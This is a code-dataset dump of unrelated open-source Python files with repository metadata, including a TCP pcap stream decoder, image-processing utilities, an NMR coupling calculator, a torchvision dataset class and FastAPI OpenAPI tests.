@classmethod
def remove_name_server_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
else:
envopts.remove_dispatcher_fd_cbs()
@classmethod
def append_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
envopts.update_ref(stk_append_monitoring_fd_cbs(data_flow_group,envopts.ref()))
@classmethod
def remove_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
dfopts = envopts.find_option(data_flow_group + "_options")
if dfopts != None:
dfopts.remove_dispatcher_fd_cbs()
@classmethod
def log(cls,level,message):
stk_log(level,message)
@classmethod
def debug(cls,component,message):
stk_debug(component,message)
| 34.276471
| 104
| 0.763686
| 5,658
| 0.970997
| 0
| 0
| 967
| 0.165952
| 0
| 0
| 657
| 0.112751
|
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8
| 1,163
|
py
|
Python
|
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
readfile.py
|
y-azvd/perceptron
|
3cd4cefc7ae54bd8a3df702300ee9797389fef4a
|
[
"MIT"
] | null | null | null |
import numpy as np
##
## @brief function_description
##
## @param filename The filename
##
## @return description_of_the_return_value
##
def readfile(filename):
csvfile = open(filename, "r")
if not csvfile:
print "error"
return -1
rows = []
for row in csvfile:
if row[0] != '#' : # linhas que comecam com # sao comentarios
row = row.strip() # removes white space around non white space
cols = row.split(',') # splits by any white space
cols = [(col.strip()) for col in cols if (col != '' or col != '\t')]
rows.append(cols)
csvfile.close()
return rows
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return description_of_the_return_value
##
def readForPerceptron(filename, dataType):
content = readfile(filename)
features = np.asarray(content, dtype=dataType)
# classifications for each feature entry/vector/array
# np.asarray modifies array on place.
featuresClassifications = np.array(features[:, -1])
# changes the classification for the bias entry to 1
features[:, -1] = 1
return features, featuresClassifications
| 23.26
| 71
| 0.674119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 568
| 0.488392
|
0b49a43a85fb689276b933c981268752b4780e5f
| 3,255
|
py
|
Python
|
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
utils.py
|
SappieKonig/eind-practicum
|
d6ef30d233706812334a52b618f4ae00380ba3b7
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2 as cv
import os
import shutil
from skimage.util.shape import view_as_windows
import torch.nn.functional as F
import torch
from functools import lru_cache
@lru_cache(maxsize=None)
def get_exp_decay_filter(filter_size=1, decay=.9, avg=True):
side = 2 * filter_size + 1
filter = torch.ones((side, side))
for i in range(side):
for j in range(side):
filter[i, j] *= decay ** (((filter_size - i) ** 2 + (filter_size - j) ** 2) ** 0.5)
if avg:
filter /= torch.sum(filter)
return filter
def accentuate_color(distance):
return -5*distance**2
def color_distance(frames, color, channel_weights=(1, 1, 1)):
channel_weights = np.array(channel_weights)
color = torch.from_numpy(np.reshape(color, (1, 1, 1, 3))).to(frames.device).float()
color = color / torch.sum(color ** 2) ** .5
frames = frames - color
frames = frames ** 2
frames = frames * torch.from_numpy(channel_weights).to(frames.device).view(1, 1, 1, 3).float()
frames = torch.sum(frames, dim=-1) ** .5
return frames
def normalize_colors(frame):
return frame / torch.sum((frame+1) ** 2, dim=-1, keepdim=True) ** .5
def filter_image(frames, filter_size=1, decay=.9, avg=True):
filter = get_exp_decay_filter(filter_size, decay, avg).to(frames.device)
return F.conv2d(frames, filter.view(1, 1, filter.shape[0], filter.shape[1]),
padding=filter_size)
def accentuation_pipeline(frames, color, channel_weights=(1, 1, 1)):
frames = normalize_colors(frames)
frames = color_distance(frames, color, channel_weights)
frames = accentuate_color(frames)
# add channel dimension
frames = torch.unsqueeze(frames, dim=1)
for i in range(4):
frames = filter_image(frames, decay=.9, avg=True)
frames = frames - torch.amax(frames, dim=(1, 2, 3), keepdim=True)
frames = torch.exp(frames * 5)
frames = project_image_to_u8(frames)
return frames
def localization_pipeline(img, color, channel_weights=(1, 1, 1)):
return get_positions(accentuation_pipeline(img, color, channel_weights))
def save(frames, fps=30, dir='movie.mp4'):
try:
os.mkdir('dump')
except FileExistsError:
pass
for i, frame in enumerate(frames):
cv.imwrite(f'dump/img{i:0>5}.png', frame)
os.system(f"ffmpeg -r {fps} -start_number 0 -i /home/sappie/PycharmProjects/DoublePendulum/dump/img%05d.png"
f" -vcodec mpeg4 -y {dir}")
shutil.rmtree('./dump')
def project_image_to_u8(frames):
frames *= 255
return frames.to(torch.uint8)
def get_positions(frame):
return np.unravel_index(np.argmax(frame), frame.shape)
def extract_position_pipeline(frames, stride):
frames = torch.unsqueeze(frames, dim=1)
filter = torch.zeros((31, 31)).to(frames.device) - .3
filter[5:26, 5:26] = get_exp_decay_filter(10, decay=.9, avg=False)
filter /= torch.sum(torch.abs(filter))
frames = F.conv2d(frames, filter.view(1, 1, filter.shape[0], filter.shape[1]),
padding=len(filter) // 2, stride=stride)
positions = torch.argmax(frames.view((frames.shape[0], -1)), dim=1)
y, x = positions // frames.shape[3], positions % frames.shape[3]
return x, y
| 31.601942
| 112
| 0.663902
| 0
| 0
| 0
| 0
| 372
| 0.114286
| 0
| 0
| 194
| 0.059601
|
0b4a7fb8ebee09432022b77e8750863d12e69e9f
| 134
|
py
|
Python
|
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
python/pangram.py
|
emiliot/hackerrank
|
7a3081f6b0a33f8402c63b94a6a54728a9adf47e
|
[
"MIT"
] | null | null | null |
s = input().strip()
res = [c for c in set(s.lower()) if c.isalpha()]
if len(res) == 26:
print("pangram")
else:
print("not pangram")
| 19.142857
| 48
| 0.604478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 22
| 0.164179
|
0b4ac3436bf4854bb94f737d096d1fe630a754a3
| 8,423
|
py
|
Python
|
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | 5
|
2017-07-31T02:07:05.000Z
|
2021-02-14T16:39:49.000Z
|
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | null | null | null |
stream.py
|
ccgcyber/xpcap
|
a0e6fd1355fd0a9cbff4e074275b236ce8c6c3b8
|
[
"MIT"
] | 4
|
2016-07-24T08:56:54.000Z
|
2020-07-12T11:50:02.000Z
|
from __future__ import print_function
import pkgutil
import stream_decoders
# this module decodes stream based protocols.
# and resolves retransmissions.
decoders= []
# __path__ is used to find the location of all decoder submodules
for impimp, name, ii in pkgutil.iter_modules(stream_decoders.__path__):
impload= impimp.find_module(name)
decoders.append(impload.load_module(name).toplevel)
import math
import time
import struct
def addrstring(*args):
if len(args)==1 and type(args[0])==tuple:
# from getaddr
args= args[0]
if len(args)==0:
raise Exception("no addr")
addr= args[0]
if len(addr)==4:
addr= ".".join(map(lambda x:str(x), struct.unpack("4B", addr)))
elif len(addr)==16:
addr= ":".join(map(lambda x:"%04x"%x if x else "", struct.unpack(">8H", addr)))
else:
raise Exception("invalid addr")
if len(args)==1:
return addr
elif len(args)==2:
return addr+"."+str(args[1])
else:
raise Exception("addr: too many items")
def getaddr(ctx, frm):
# ipaddr
if hasattr(ctx, frm):
return getattr(ctx, frm)
# ipaddr + portnum
for proto in ("udp", "tcp"):
if hasattr(ctx, proto):
return getattr(ctx.ip, frm), getattr(getattr(ctx, proto), frm)
# ipaddr
return getattr(ctx.ip, frm)
def pkttag(ip, p):
if p.src < p.dst:
return "%s:%s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
elif p.src > p.dst:
return "%s:%s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
elif ip.src < ip.dst:
return "%s:%s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
else:
return "%s:%s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
def pktprefix(ip, p):
if p.src < p.dst:
return "%s < %s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
elif p.src > p.dst:
return "%s > %s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
elif ip.src < ip.dst:
return "%s < %s" % (addrstring(ip.dst, p.dst), addrstring(ip.src, p.src))
else:
return "%s > %s" % (addrstring(ip.src, p.src), addrstring(ip.dst, p.dst))
def tsformat(ts):
f, n= math.modf(ts)
return time.strftime("%H:%M:%S", time.localtime(n))+("%.6f" % f)[1:]
class StreamAutoDetect:
def __init__(self):
self.data= {}
self.decoder= None
# todo for 'src' pass: 'clt', 'svr' + clt+svr addr:ports
def handle(self, src, data, ofs, last):
if self.decoder:
return self.decoder.handle(src, data, ofs, last)
if src in self.data:
data = self.data[src] + data[ofs:last]
ofs, last= 0, len(data)
# try to determine what decoder to use
for cls in decoders:
# todo: pass both svr+clt traffic to isvaliddata.
if cls.isvaliddata(data, ofs, last):
if src in self.data:
del self.data[src]
self.setdecoder(cls, src, data, ofs, last)
return
def setdecoder(self, cls, src, sdata, ofs, last):
self.decoder= cls(self)
# first forward older data
for s, ddata in self.data.items():
o= self.decoder.handle(s, ddata, 0, len(ddata))
# todo: resulting ofs
del self.data[s]
if o<len(ddata):
print("stream WARN: ddata remaining: %s" % (ddata[o:].encode("hex")))
# then forward this data
ofs= self.decoder.handle(src, sdata, ofs, last)
# todo: optionally clear data
#self.data[src]= sdata
if ofs<last:
print("stream WARN: sdata remaining: %s" % (sdata[ofs:].encode("hex")))
def handlegap(self, src, size):
pass
#print("gap: %d" % size)
class StreamDecoder:
def __init__(self):
self.seq= {}
self.cur= {}
self.protocol = StreamAutoDetect()
self.totalgap = 0
self.seqmap= {}
def __del__(self):
if any(len(x) for x in self.seqmap.values()):
#print("seq: ", self.seq)
#print("cur: ", self.cur)
#print("map: ", self.seqmap)
pass
@staticmethod
def tcpflags(tcp):
f= ""
if tcp.URG: f+="U"
if tcp.ACK: f+="A"
if tcp.PSH: f+="P"
if tcp.RST: f+="R"
if tcp.SYN: f+="S"
if tcp.FIN: f+="F"
return f
# handle without packet reordering
# ... this is currently not used, see 'reorder'
def handle(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
#print("GAP: %08x-%08x" % (self.cur[src], ctx.tcp.seq))
self.totalgap += ctx.tcp.seq-self.cur[src]
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
if ctx.tcp.payload and self.totalgap:
self.protocol.handlegap(src, self.totalgap)
self.totalgap= 0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x:%08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s %s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f, ctx.tcp.payload.encode("hex")))
if skip < len(ctx.tcp.payload):
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
elif len(ctx.tcp.payload):
print("dropped")
self.cur[src] = endseq
# handle with packet reordering
def reorder(self, ctx):
src= addrstring(getaddr(ctx, "src"))
dst= addrstring(getaddr(ctx, "dst"))
# if any(len(x) for x in self.seqmap.values()):
# print(self.seqmap)
# save all pkts in seqmap
if not src in self.seqmap:
self.seqmap[src]= {}
self.seqmap[src][ctx.tcp.seq]= ctx
# then try to process pkts
for k in sorted(self.seqmap[src].keys()):
ctx= self.seqmap[src][k]
if not src in self.seq:
self.seq[src]= ctx.tcp.seq
if not dst in self.seq and ctx.tcp.ack:
self.seq[dst]= ctx.tcp.ack
f= self.tcpflags(ctx.tcp)
skip= 0
extra= ctx.tcp.FIN or ctx.tcp.SYN
endseq= ctx.tcp.seq + len(ctx.tcp.payload)+extra
if not src in self.cur:
self.cur[src]= ctx.tcp.seq
elif self.cur[src] < ctx.tcp.seq:
# gap -> output later
# todo: on FIN: do forward gapped data to protocol.handler.
##print("gap %d" % (ctx.tcp.seq-self.cur[src]))
break
elif self.cur[src] > ctx.tcp.seq:
#print("OVERLAP: %08x-%08x" % (ctx.tcp.seq, self.cur[src]))
# handle retransmit
skip= self.cur[src] - ctx.tcp.seq
##print("retransmitted %d" % skip)
# todo: detect server/client direction
# client: SYN has ctx.tcp.ack==0
# server: SYN has ctx.tcp.ack!=0
#seqnr= "[%08x]" % ctx.tcp.seq-self.seq[src]
seqnr= "[%08x-%08x %08x]" % (ctx.tcp.seq, endseq, ctx.tcp.ack)
print("%s TCP %-45s %s%-2s" % (tsformat(ctx.pcap.ts), pktprefix(ctx.ip, ctx.tcp),
seqnr, f))
if skip < len(ctx.tcp.payload):
# todo: pass server/client flag + source/dest ports
self.protocol.handle(src, ctx.tcp.payload, skip, len(ctx.tcp.payload))
self.cur[src] = endseq
del self.seqmap[src][k]
class StreamManager:
def __init__(self):
self.streams= {}
def handle(self, ctx):
tag= pkttag(ctx.ip, ctx.tcp)
if not tag in self.streams:
self.streams[tag]= StreamDecoder()
self.streams[tag].reorder(ctx)
| 32.396154
| 93
| 0.544343
| 6,089
| 0.722902
| 0
| 0
| 229
| 0.027187
| 0
| 0
| 1,793
| 0.21287
|
0b4afb977af41e7750f169c98501350be4fa6ae6
| 247
|
py
|
Python
|
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | null | null | null |
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | 3
|
2020-09-16T13:30:17.000Z
|
2020-09-19T09:56:50.000Z
|
app/db/connection.py
|
melhin/streamchat
|
8a3e7ffdcf4bc84045df71259556f4267a755351
|
[
"MIT"
] | null | null | null |
import logging
import aioredis
from app.core.config import REDIS_DSN, REDIS_PASSWORD
logger = logging.getLogger(__name__)
async def get_redis_pool():
return await aioredis.create_redis(REDIS_DSN, encoding='utf-8', password=REDIS_PASSWORD)
| 22.454545
| 92
| 0.805668
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.48583
| 7
| 0.02834
|
0b4cc6aa957df616a9c14313fa9b9ee7ec6d0837
| 1,434
|
py
|
Python
|
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
calculators/static_dipolar_couplings/dcc.py
|
jlorieau/nmr
|
15224342a9277da8b02e10027644c86ac3769db1
|
[
"MIT"
] | null | null | null |
from math import pi
u0 = 4.*pi*1E-7 # T m /A
hbar = 1.0545718E-34 # J s
# 1 T = kg s^-2 A-1 = J A^-1 m^-2
g = {
'1H' : 267.513E6, # rad T^-1 s^-1
'13C': 67.262E6,
'15N': -27.116E6,
'e': 176086E6
}
# nuc_i, nuc_j: nucleus string. ex: '1H'
# r_ij: distance in Angstroms
DCC = lambda nuc_i, nuc_j, r_ij: -1.*(u0*g[nuc_i]*g[nuc_j]*hbar)/(4.*pi*(r_ij*1E-10)**3)
print('-'*30)
print('1H-15N (1.02A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.02)/(2.*pi), 'Hz'))
print('1H-15N (1.04A): {:> 8.1f} Hz'.format(DCC('1H','15N', 1.04)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-13C (1.1A): {:> 8.1f} Hz'.format(DCC('1H','13C', 1.1)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-1H (1.00A): {:> 8.1f} Hz'.format(DCC('1H','1H', 1.0)/(2.*pi), 'Hz'))
print('1H-1H (2.4A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.4)/(2.*pi), 'Hz'))
print('1H-1H (2.8A): {:> 8.1f} Hz'.format(DCC('1H','1H', 2.8)/(2.*pi), 'Hz'))
print('-'*30)
print('13C-13C (1.53A): {:> 8.1f} Hz'.format(DCC('13C','13C', 1.53)/(2.*pi), 'Hz'))
print('-'*30)
print('1H-e (1A): {:> 8.1f} MHz'.format(DCC('1H','e', 1.0)/(1E6*2.*pi), 'Hz'))
print('1H-e (5A): {:> 8.1f} kHz'.format(DCC('1H','e', 5.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (10A): {:> 8.1f} kHz'.format(DCC('1H','e', 10.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (50A): {:> 8.1f} kHz'.format(DCC('1H','e', 50.0)/(1E3*2.*pi), 'Hz'))
print('1H-e (100A): {:> 8.1f} Hz'.format(DCC('1H','e', 100.0)/(2.*pi), 'Hz'))
print('-'*30)
| 34.142857
| 89
| 0.502092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 647
| 0.451185
|
0b4dc3067343c33e32c44d539a787edba0c40515
| 2,197
|
py
|
Python
|
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | 1
|
2022-03-31T02:37:35.000Z
|
2022-03-31T02:37:35.000Z
|
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | null | null | null |
torchvision/prototype/datasets/_builtin/country211.py
|
SariaCxs/vision
|
1db8795733b91cd6dd62a0baa7ecbae6790542bc
|
[
"BSD-3-Clause"
] | null | null | null |
import pathlib
from typing import Any, Dict, List, Tuple
from torchdata.datapipes.iter import IterDataPipe, Mapper, Filter
from torchvision.prototype.datasets.utils import Dataset, DatasetConfig, DatasetInfo, HttpResource, OnlineResource
from torchvision.prototype.datasets.utils._internal import path_comparator, hint_sharding, hint_shuffling
from torchvision.prototype.features import EncodedImage, Label
class Country211(Dataset):
def _make_info(self) -> DatasetInfo:
return DatasetInfo(
"country211",
homepage="https://github.com/openai/CLIP/blob/main/data/country211.md",
valid_options=dict(split=("train", "val", "test")),
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
return [
HttpResource(
"https://openaipublic.azureedge.net/clip/data/country211.tgz",
sha256="c011343cdc1296a8c31ff1d7129cf0b5e5b8605462cffd24f89266d6e6f4da3c",
)
]
_SPLIT_NAME_MAPPER = {
"train": "train",
"val": "valid",
"test": "test",
}
def _prepare_sample(self, data: Tuple[str, Any]) -> Dict[str, Any]:
path, buffer = data
category = pathlib.Path(path).parent.name
return dict(
label=Label.from_category(category, categories=self.categories),
path=path,
image=EncodedImage.from_file(buffer),
)
def _filter_split(self, data: Tuple[str, Any], *, split: str) -> bool:
return pathlib.Path(data[0]).parent.parent.name == split
def _make_datapipe(
self, resource_dps: List[IterDataPipe], *, config: DatasetConfig
) -> IterDataPipe[Dict[str, Any]]:
dp = resource_dps[0]
dp = Filter(dp, path_comparator("parent.parent.name", self._SPLIT_NAME_MAPPER[config.split]))
dp = hint_shuffling(dp)
dp = hint_sharding(dp)
return Mapper(dp, self._prepare_sample)
def _generate_categories(self, root: pathlib.Path) -> List[str]:
resources = self.resources(self.default_config)
dp = resources[0].load(root)
return sorted({pathlib.Path(path).parent.name for path, _ in dp})
| 38.54386
| 114
| 0.65817
| 1,786
| 0.812927
| 0
| 0
| 0
| 0
| 0
| 0
| 276
| 0.125626
|
0b5048a8c70006e924308165169ee5c4fabe48fa
| 934
|
py
|
Python
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 3
|
2021-01-07T07:46:50.000Z
|
2021-11-17T10:48:39.000Z
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 3
|
2018-02-19T20:30:30.000Z
|
2018-04-20T23:25:29.000Z
|
asar_pi_applications/asar_vision/robot_distance_incorrect.py
|
ssnover95/msd-p18542
|
32bef466f9d5ba55429da2119a14081b3e411d0b
|
[
"MIT"
] | 1
|
2021-01-07T07:46:52.000Z
|
2021-01-07T07:46:52.000Z
|
import numpy as np
from math import sqrt
def robot_distance_incorrect(robot_actual_location, hexagon_pixel_values):
distance_to_get_back = []
distances = []
pixel_distance = []
for i in range(0, len(hexagon_pixel_values)):
dist = sqrt((robot_actual_location[0] - hexagon_pixel_values[i][0]) ** 2 +
(robot_actual_location[1] - hexagon_pixel_values[i][1]) ** 2)
distances += [dist]
index_min = np.argmin(distances)
correct_position = hexagon_pixel_values[index_min]
# find the distance that needs to be traveled to get to the correct location
pixel_distance = (correct_position[0] - robot_actual_location[0], correct_position[1]-robot_actual_location[1])
# print(correct_position, robot_actual_location, pixel_distance)
# convert to actual distance
distance_to_get_back = (pixel_distance[0]/1.79, pixel_distance[1]/1.749)
return distance_to_get_back
| 44.47619
| 115
| 0.723769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 168
| 0.179872
|
0b519f8596f5bf7ee53103adc8d550ce1fb62540
| 68,172
|
py
|
Python
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | 1
|
2022-01-08T16:39:28.000Z
|
2022-01-08T16:39:28.000Z
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | 1
|
2022-01-07T21:04:04.000Z
|
2022-01-07T21:04:04.000Z
|
tests/test_generate_unique_id_function.py
|
ssensalo/fastapi
|
146f57b8f70c5757dc20edc716dba1b96936a8d6
|
[
"MIT"
] | null | null | null |
import warnings
from typing import List
from fastapi import APIRouter, FastAPI
from fastapi.routing import APIRoute
from fastapi.testclient import TestClient
from pydantic import BaseModel
def custom_generate_unique_id(route: APIRoute):
return f"foo_{route.name}"
def custom_generate_unique_id2(route: APIRoute):
return f"bar_{route.name}"
def custom_generate_unique_id3(route: APIRoute):
return f"baz_{route.name}"
class Item(BaseModel):
name: str
price: float
class Message(BaseModel):
title: str
description: str
def test_top_level_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter()
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "foo_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_router": {
"title": "Body_foo_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_router_overrides_generate_unique_id():
app = FastAPI(generate_unique_id_function=custom_generate_unique_id)
router = APIRouter(generate_unique_id_function=custom_generate_unique_id2)
@app.post("/", response_model=List[Item], responses={404: {"model": List[Message]}})
def post_root(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
@router.post(
"/router", response_model=List[Item], responses={404: {"model": List[Message]}}
)
def post_router(item1: Item, item2: Item):
return item1, item2 # pragma: nocover
app.include_router(router)
client = TestClient(app)
response = client.get("/openapi.json")
data = response.json()
assert data == {
"openapi": "3.0.2",
"info": {"title": "FastAPI", "version": "0.1.0"},
"paths": {
"/": {
"post": {
"summary": "Post Root",
"operationId": "foo_post_root",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_root"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post Root",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post Root",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
"/router": {
"post": {
"summary": "Post Router",
"operationId": "bar_post_router",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_bar_post_router"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Bar Post Router",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Bar Post Router",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_bar_post_router": {
"title": "Body_bar_post_router",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_root": {
"title": "Body_foo_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
